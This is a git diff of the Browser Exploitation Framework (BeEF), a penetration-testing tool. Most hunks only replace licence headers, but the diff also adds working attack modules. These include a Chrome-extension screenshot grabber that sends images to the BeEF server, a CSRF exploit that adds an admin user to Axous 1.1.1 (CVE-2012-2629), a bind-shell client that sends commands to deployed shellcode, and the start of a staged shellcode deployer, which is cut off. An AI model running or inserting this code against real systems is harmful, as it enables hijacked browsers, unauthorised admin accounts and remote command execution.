limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/get_chrome_extensions/module.rb b/modules/chrome_extensions/get_chrome_extensions/module.rb index fa42f2e97..c3c027081 100644 --- a/modules/chrome_extensions/get_chrome_extensions/module.rb +++ b/modules/chrome_extensions/get_chrome_extensions/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # More info: # http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html diff --git a/modules/chrome_extensions/grab_google_contacts/command.js b/modules/chrome_extensions/grab_google_contacts/command.js index 0f75afdeb..e19bfe46f 100644 --- a/modules/chrome_extensions/grab_google_contacts/command.js +++ b/modules/chrome_extensions/grab_google_contacts/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var regContacts = '("AuthToken":{"Value":")(.*)("}}};)'; function grabCSV(token){ diff --git a/modules/chrome_extensions/grab_google_contacts/config.yaml b/modules/chrome_extensions/grab_google_contacts/config.yaml index 2046f12b6..2ee430c3c 100644 --- a/modules/chrome_extensions/grab_google_contacts/config.yaml +++ b/modules/chrome_extensions/grab_google_contacts/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/grab_google_contacts/module.rb b/modules/chrome_extensions/grab_google_contacts/module.rb index 01b9f8c0a..a4f2b9022 100644 --- a/modules/chrome_extensions/grab_google_contacts/module.rb +++ b/modules/chrome_extensions/grab_google_contacts/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Grab_google_contacts < BeEF::Core::Command diff --git a/modules/chrome_extensions/inject_beef/command.js b/modules/chrome_extensions/inject_beef/command.js index 0e1a6ec14..ec878845a 100755 --- a/modules/chrome_extensions/inject_beef/command.js +++ b/modules/chrome_extensions/inject_beef/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook; diff --git a/modules/chrome_extensions/inject_beef/config.yaml b/modules/chrome_extensions/inject_beef/config.yaml index 6df5193fb..92416d2dd 100755 --- a/modules/chrome_extensions/inject_beef/config.yaml +++ b/modules/chrome_extensions/inject_beef/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/inject_beef/module.rb b/modules/chrome_extensions/inject_beef/module.rb index ebb133088..346daea70 100755 --- a/modules/chrome_extensions/inject_beef/module.rb +++ b/modules/chrome_extensions/inject_beef/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Inject_beef < BeEF::Core::Command diff --git a/modules/chrome_extensions/screenshot/command.js b/modules/chrome_extensions/screenshot/command.js new file mode 100755 index 000000000..bc5df119a --- /dev/null +++ b/modules/chrome_extensions/screenshot/command.js @@ -0,0 +1,13 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + chrome.tabs.captureVisibleTab(null, function(img) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'img: ' + img.toString()); + }); +}); + diff --git a/modules/chrome_extensions/screenshot/config.yaml b/modules/chrome_extensions/screenshot/config.yaml new file mode 100755 index 000000000..3b293bd55 --- /dev/null +++ b/modules/chrome_extensions/screenshot/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + screenshot: + enable: true + category: "Chrome Extensions" + name: "Screenshot" + description: "Screenshots current tab the user is in, screenshot returned as base64d data for a dataurl" + authors: ["mh"] + target: + working: ["C"] + not_working: ["All"] diff --git a/modules/chrome_extensions/screenshot/module.rb b/modules/chrome_extensions/screenshot/module.rb new file mode 100755 index 000000000..714290a43 --- /dev/null +++ b/modules/chrome_extensions/screenshot/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Screenshot < BeEF::Core::Command + + def post_execute + content = {} + content['Return'] = @datastore['return'] + save content + end + +end diff --git a/modules/chrome_extensions/send_gvoice_sms/command.js b/modules/chrome_extensions/send_gvoice_sms/command.js index 279b56c76..a2024ee12 100755 --- a/modules/chrome_extensions/send_gvoice_sms/command.js +++ b/modules/chrome_extensions/send_gvoice_sms/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var to = "<%= @to %>"; var message = "<%= @message %>"; diff --git a/modules/chrome_extensions/send_gvoice_sms/config.yaml b/modules/chrome_extensions/send_gvoice_sms/config.yaml index e8e99a730..4253c482d 100755 --- a/modules/chrome_extensions/send_gvoice_sms/config.yaml +++ b/modules/chrome_extensions/send_gvoice_sms/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/send_gvoice_sms/module.rb b/modules/chrome_extensions/send_gvoice_sms/module.rb index a692f861c..85950bc03 100755 --- a/modules/chrome_extensions/send_gvoice_sms/module.rb +++ b/modules/chrome_extensions/send_gvoice_sms/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Send_gvoice_sms < BeEF::Core::Command diff --git a/modules/debug/test_cors_request/command.js b/modules/debug/test_cors_request/command.js new file mode 100644 index 000000000..bfe5abc2d --- /dev/null +++ b/modules/debug/test_cors_request/command.js @@ -0,0 +1,16 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var method = "<%= @method %>"; + var url = "<%= @url %>"; + var data = "<%= @data %>"; + + beef.net.cors.request(method, url, data, function(response) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "response="+JSON.stringify(response)); }); + +}); + diff --git a/modules/debug/test_cors_request/config.yaml b/modules/debug/test_cors_request/config.yaml new file mode 100644 index 000000000..767060493 --- /dev/null +++ b/modules/debug/test_cors_request/config.yaml @@ -0,0 +1,28 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + test_cors_request: + enable: true + category: "Debug" + name: "Test CORS Request" + description: "Test the beef.net.cors.request function by retrieving a URL." + authors: ["bcoles"] + target: + working: ["ALL"] + not_working: + IE: + min_ver: 6 + max_ver: 7 + O: + min_ver: 1 + max_ver: 11 + C: + min_ver: 1 + max_ver: 2 + S: + min_ver: 1 + max_ver: 3 diff --git a/modules/debug/test_cors_request/module.rb b/modules/debug/test_cors_request/module.rb new file mode 100644 index 000000000..98bb97973 --- /dev/null +++ b/modules/debug/test_cors_request/module.rb @@ -0,0 +1,23 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Test_cors_request < BeEF::Core::Command + + def post_execute + content = {} + content['response'] = @datastore['response'] + save content + end + + def self.options + + return [ + {'name' => 'method', 'ui_label' =>'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' }, + {'name' => 'url', 'ui_label' =>'URL', 'type' => 'text', 'width' => '400px', 'value' => 'http://graph.facebook.com/fql?q=SELECT%20url,total_count%20FROM%20link_stat%20WHERE%20url=%27http://beefproject.com/%27' }, + {'name' => 'data', 'ui_label' =>'Data', 'type' => 'text', 'width' => '400px', 'value' => 'postdata' }, + ] + end + +end diff --git a/modules/debug/test_network_request/command.js b/modules/debug/test_network_request/command.js index 1e298d835..97bca59b8 100644 --- a/modules/debug/test_network_request/command.js +++ b/modules/debug/test_network_request/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var scheme = "<%= @scheme %>"; diff --git a/modules/debug/test_network_request/config.yaml b/modules/debug/test_network_request/config.yaml index f753bf17c..b8ba5904d 100644 --- a/modules/debug/test_network_request/config.yaml +++ b/modules/debug/test_network_request/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/debug/test_network_request/module.rb b/modules/debug/test_network_request/module.rb index e4de490dd..bddfb3459 100644 --- a/modules/debug/test_network_request/module.rb +++ b/modules/debug/test_network_request/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Test_network_request < BeEF::Core::Command diff --git a/modules/debug/test_return_ascii_chars/command.js b/modules/debug/test_return_ascii_chars/command.js index e19a1ea91..afdcea3d8 100644 --- a/modules/debug/test_return_ascii_chars/command.js +++ b/modules/debug/test_return_ascii_chars/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var str = ''; diff --git a/modules/debug/test_return_ascii_chars/config.yaml b/modules/debug/test_return_ascii_chars/config.yaml index 64eff01e8..7d8c2f4f7 100644 --- a/modules/debug/test_return_ascii_chars/config.yaml +++ b/modules/debug/test_return_ascii_chars/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/debug/test_return_ascii_chars/module.rb b/modules/debug/test_return_ascii_chars/module.rb index 1f4b40690..ae81dbfba 100644 --- a/modules/debug/test_return_ascii_chars/module.rb +++ b/modules/debug/test_return_ascii_chars/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Test_return_ascii_chars < BeEF::Core::Command diff --git a/modules/debug/test_return_long_string/command.js b/modules/debug/test_return_long_string/command.js index da26b067d..656a48fd7 100644 --- a/modules/debug/test_return_long_string/command.js +++ b/modules/debug/test_return_long_string/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var repeat_value = "<%= @repeat_string %>"; diff --git a/modules/debug/test_return_long_string/config.yaml b/modules/debug/test_return_long_string/config.yaml index c44d85390..0bbafff83 100644 --- a/modules/debug/test_return_long_string/config.yaml +++ b/modules/debug/test_return_long_string/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/debug/test_return_long_string/module.rb b/modules/debug/test_return_long_string/module.rb index 4e1edc68f..f637fc511 100644 --- a/modules/debug/test_return_long_string/module.rb +++ b/modules/debug/test_return_long_string/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Test_return_long_string < BeEF::Core::Command diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/command.js b/modules/exploits/axous_1_1_1_add_user_csrf/command.js new file mode 100644 index 000000000..6c4c84a03 --- /dev/null +++ b/modules/exploits/axous_1_1_1_add_user_csrf/command.js @@ -0,0 +1,31 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var base = '<%= @base %>'; + var username = '<%= @username %>'; + var password = '<%= @password %>'; + var email = '<%= @email %>'; + + var axous_iframe = beef.dom.createIframeXsrfForm(base, "POST", [ + {'type':'hidden', 'name':'user_name', 'value':username}, + {'type':'hidden', 'name':'new_passwd', 'value':password}, + {'type':'hidden', 'name':'new_passwd1', 'value':password}, + {'type':'hidden', 'name':'email', 'value':email}, + {'type':'hidden', 'name':'dosubmit', 'value':'1'} , + {'type':'hidden', 'name':'id', 'value':''}, + {'type':'hidden', 'name':'action', 'value':'addnew'} , + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(axous_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml new file mode 100644 index 000000000..94f2d4549 --- /dev/null +++ b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + axous_add_user_csrf: + enable: true + category: "Exploits" + name: "Axous <= 1.1.1 Add User CSRF" + description: "Attempts to add a user to an Axous <= 1.1.1 install (CVE-2012-2629)." + authors: ["bcoles", "Ivano Binetti"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/module.rb b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb new file mode 100644 index 000000000..587af0530 --- /dev/null +++ b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb @@ -0,0 +1,21 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Axous_add_user_csrf < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'base', 'ui_label' => 'Axous URL', 'value' => 'http://target/admin/administrators_add.php'}, + { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'}, + { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'}, + { 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/beefbind/beef_bind_shell/command.js b/modules/exploits/beefbind/beef_bind_shell/command.js new file mode 100755 index 000000000..f4a0fc902 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_shell/command.js @@ -0,0 +1,86 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function () { + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var path = '<%= @path %>'; + var cmd = '<%= @cmd %>'; + + var uri = "http://" + rhost + ":" + rport + path; + + strip_output = function(output){ + + var offset = 0; + for(var c in output){ + c = output.charAt(c); + if(c.charCodeAt(0) == 0){ + break; + } + offset++; + } + return output.substring(0,offset); + }; + + var counter = 0; + get_additional_cmd_results = function(){ + xhr = new XMLHttpRequest(); + xhr.onreadystatechange = function(){ + if(xhr.readyState == 4){ + var result = strip_output(xhr.responseText); + console.log("result.length: " + result.length); + if(result.length != 0){ + console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result); + beef.net.send("<%= @command_url %>", <%= @command_id %>, result); + counter++; + setTimeout("get_additional_cmd_results()",500); + } + }else{ // No more command results, ready to send another command. + console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]"); + } + }; + xhr.open("GET", uri, false); + xhr.send(null); + }; + + get_prompt = function () { + + xhr = new XMLHttpRequest(); + xhr.onreadystatechange = function(){ + if(xhr.readyState == 4){ + console.log("get_prompt: Retrieved prompt"); + var prompt = strip_output(xhr.responseText); + console.log(prompt); + beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt); + + //send command + send_command(cmd); + } + }; + xhr.open("GET", uri, false); + xhr.send(null); + }; + + send_command = function(command){ + xhr = new XMLHttpRequest(); + xhr.onreadystatechange = function(){ + var cmd_result = strip_output(xhr.responseText); + console.log(cmd_result); + beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result); + }; + xhr.open("POST", uri, false); + xhr.setRequestHeader("Content-Type", "text/plain"); + command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?" + xhr.send(command); + setTimeout("get_additional_cmd_results()",500); + }; + + + +get_prompt(); + +}); + diff --git a/modules/exploits/beefbind/beef_bind_shell/config.yaml b/modules/exploits/beefbind/beef_bind_shell/config.yaml new file mode 100755 index 000000000..2aa33ea98 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_shell/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + BeEF_bind_shell: + enable: true + category: ["Exploits", "BeEF_bind"] + name: "BeEF bind shell" + description: "Send commands to be executed on the already deployed BeEF_bind shellcode, and get results back." + authors: ["antisnatchor", "tymiller"] # shellcode awesomeness -> Ty Miller + target: + working: ["FF", "C", "S"] diff --git a/modules/exploits/beefbind/beef_bind_shell/module.rb b/modules/exploits/beefbind/beef_bind_shell/module.rb new file mode 100755 index 000000000..c111a2016 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_shell/module.rb @@ -0,0 +1,21 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Beef_bind_shell < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'}, + { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'}, + { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'}, + { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js new file mode 100755 index 000000000..850858d5a --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js @@ -0,0 +1,387 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function () { + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var service_port = '<%= @service_port %>'; + var path = '<%= @path %>'; + var delay = parseInt('<%= @delay %>'); + + var beef_host = '<%= @beef_host %>'; + var beef_port = '<%= @beef_port %>'; + var beef_junk_port = '<%= @beef_junk_port %>'; + var sock_name = '<%= @beef_junk_socket %>'; + + //todo: this will be obviously dynamic as soon as we'll have more IPEC exploits. + var available_space = 769; + + // base64 decode function that works properly with binary data (like shellcode) + var Base64Binary = { + _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", + + decode:function (input) { + //get last chars to see if are valid + var lkey1 = this._keyStr.indexOf(input.charAt(input.length - 1)); + var lkey2 = this._keyStr.indexOf(input.charAt(input.length - 1)); + + var 